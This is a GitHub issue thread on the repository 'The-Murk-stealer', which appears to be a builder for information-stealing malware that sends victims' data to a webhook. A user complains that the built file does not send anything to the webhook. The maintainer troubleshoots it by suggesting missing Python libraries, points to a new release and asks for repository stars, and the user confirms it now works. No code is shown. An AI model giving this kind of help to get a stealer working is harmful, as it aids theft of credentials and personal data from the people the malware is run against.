### ISSUE TITLE
doesn't work

### ISSUE THREAD

**Issue by RiaxStuff** [Nick-Vinesmoke/The-Murk-stealer#15]
I've built it on a normal machine and it returned "built successfully" around 3 times and when I open the file it does nothing it won't send it to the webhook.

**Comment by Nick-Vinesmoke** [comment]
Try to install all Python libraries and Python and make a video of how you build it

**Comment by Nick-Vinesmoke** [comment]
Sorry, this is most likely due to the fact that I forgot to add some Python libraries to the swing before the build

**Comment by RiaxStuff** [comment]
alright, thanks for the fast response

**Comment by Nick-Vinesmoke** [comment]
try this https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v6.0.1

**Comment by Nick-Vinesmoke** [comment]
Tell me if you get some bugs, cause after a huge update It was the first version. So there can be some bugs

**Comment by Nick-Vinesmoke** [comment]
⭐Please, star this repo if it was helpful⭐

**Comment by FU3X** [comment]
> ⭐Please, star this repo if it was helpful⭐

i replied on that closed issue

**Comment by RiaxStuff** [comment]
yup, all is good.
thanks for the support.

**Comment by Nick-Vinesmoke** [comment]
⭐Please, star this repo if it was helpful⭐
